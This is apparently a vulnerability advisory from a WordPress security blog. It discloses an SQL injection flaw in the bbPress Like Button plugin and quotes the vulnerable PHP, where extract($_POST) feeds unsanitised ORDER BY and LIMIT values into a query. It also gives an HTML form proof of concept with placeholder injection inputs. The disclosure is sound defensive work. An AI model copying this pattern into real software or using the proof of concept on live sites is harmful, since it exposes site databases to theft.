03 Oct

SQL Injection Vulnerability in bbPress Like Button

One of the things we do to make sure we are providing our customers with the best data on the vulnerabilities that exist and are being exploited in WordPress plugins is to monitor our websites for hacking attempts. Through that we have found a quite a few vulnerabilities that exist in the current versions of plugins that it looks like hackers have already started exploiting. In the most recent case though we are still not quite sure what the hacker was targeting. Recently we found a hacker probing for usage of the plugin bbPress Like Button, along with five other plugins at the same time. As we started looking over the plugins, one connection we found was that they all contained code that looked susceptible to SQL injections. That type of vulnerability is not one we often see target by hackers, so it is possible there is an additional issue with the plugin.

The vulnerable code can be found the file /json_logs.php whenre the extract() function is used to set variable from POST inputs and then those are used in a SQL query without any sanitization or the query being parametrized:

5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
extract($_POST);
 
//Defaults
if(!isset($sortname) || $sortname == ''){
    $sortname = 'meta_id';
}
if(!isset($sortorder)){
    $sortorder = 'desc';
}
if(!isset($rp)){
    $rp = '1000';
}
if(!isset($page)){
    $page = 1;
}
$sortorder = strtoupper($sortorder);
$offset = ((Integer)$page - 1) * $rp;
 
//Get the data
global $wpdb;
$table_name = $wpdb->prefix.'postmeta';
 
$results = $wpdb->get_results("SELECT * FROM $table_name where meta_key = 'bbpl_like' ORDER BY $sortname $sortorder LIMIT $rp OFFSET $offset",ARRAY_A)

Proof of Concept

The following proof of concept will permit SQL injection to occur.

Make sure to replace “[path to WordPress]” with the location of WordPress and the “[SQL injection input …]” with appropriate input.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/bbpress-like-button/json_logs.php" method="POST">
<input type="hidden" name="sortname" value="[SQL injection input after ORDER BY]" />
<input type="hidden" name="sortorder" value="[SQL injection input after ORDER BY]" />
<input type="hidden" name="rp" value="[SQL injection input after LIMIT]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/3/2016 – WordPress.org Plugin Directory notified.

Leave a Reply

Your email address will not be published. Required fields are marked *